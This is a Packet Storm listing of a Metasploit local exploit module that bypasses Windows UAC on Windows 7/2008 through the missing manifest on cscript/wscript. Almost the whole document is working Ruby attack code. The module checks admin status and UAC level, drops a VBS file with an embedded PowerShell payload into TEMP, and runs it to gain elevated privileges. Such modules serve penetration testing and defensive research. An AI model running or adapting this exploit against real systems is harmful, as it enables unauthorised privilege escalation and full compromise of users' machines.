Windows Escalate UAC Protection Bypass

2015-09-04T00:00:00
ID PACKETSTORM:133448
Type packetstorm
Reporter Ben Campbell
Modified 2015-09-04T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Exploit::FileDropper  
include Exploit::Powershell  
include Post::File  
include Post::Windows::Priv  
include Post::Windows::Runas  
  
def initialize(info={})  
super( update_info( info,  
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',  
'Description' => %q{  
This module will bypass Windows UAC by utilizing the missing .manifest on the script host  
cscript/wscript.exe binaries.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Vozzie',  
'Ben Campbell'  
],  
'Platform' => [ 'win' ],  
'SessionTypes' => [ 'meterpreter' ],  
'Targets' => [  
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]  
],  
'DefaultTarget' => 0,  
'References' => [  
[  
'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',  
'URL', 'https://github.com/Vozzie/uacscript'  
]  
],  
'DisclosureDate'=> 'Aug 22 2015'  
))  
  
end  
  
def exploit  
# Validate that we can actually do things before we bother  
# doing any more work  
validate_environment!  
check_permissions!  
  
# get all required environment variables in one shot instead. This  
# is a better approach because we don't constantly make calls through  
# the session to get the variables.  
env_vars = get_envs('TEMP', 'WINDIR')  
  
case get_uac_level  
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,  
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,  
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT  
fail_with(Failure::NotVulnerable,  
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."  
)  
when UAC_DEFAULT  
print_good('UAC is set to Default')  
print_good('BypassUAC can bypass this setting, continuing...')  
when UAC_NO_PROMPT  
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')  
shell_execute_exe  
return  
end  
  
vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"  
  
upload_vbs(vbs_filepath)  
  
cmd_exec("cscript.exe //B #{vbs_filepath}")  
end  
  
def check_permissions!  
# Check if you are an admin  
vprint_status('Checking admin status...')  
admin_group = is_in_admin_group?  
  
if admin_group.nil?  
print_error('Either whoami is not there or failed to execute')  
print_error('Continuing under assumption you already checked...')  
else  
if admin_group  
print_good('Part of Administrators group! Continuing...')  
else  
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')  
end  
end  
  
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]  
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')  
end  
end  
  
def upload_vbs(payload_filepath)  
vbs = File.read(File.join(Msf::Config.data_directory,  
'exploits',  
'scripthost_uac_bypass',  
'bypass.vbs'))  
  
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)  
  
vbs.gsub!('COMMAND', command)  
print_status('Uploading the Payload VBS to the filesystem...')  
begin  
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")  
write_file(payload_filepath, vbs)  
register_file_for_cleanup(payload_filepath)  
rescue Rex::Post::Meterpreter::RequestError => e  
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")  
end  
end  
  
def validate_environment!  
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?  
  
winver = sysinfo['OS']  
  
case winver  
when /Windows (7|2008)/  
print_good("#{winver} may be vulnerable.")  
else  
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")  
end  
  
if is_uac_enabled?  
print_status('UAC is Enabled, checking level...')  
else  
unless is_in_admin_group?  
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')  
end  
end  
end  
end  
`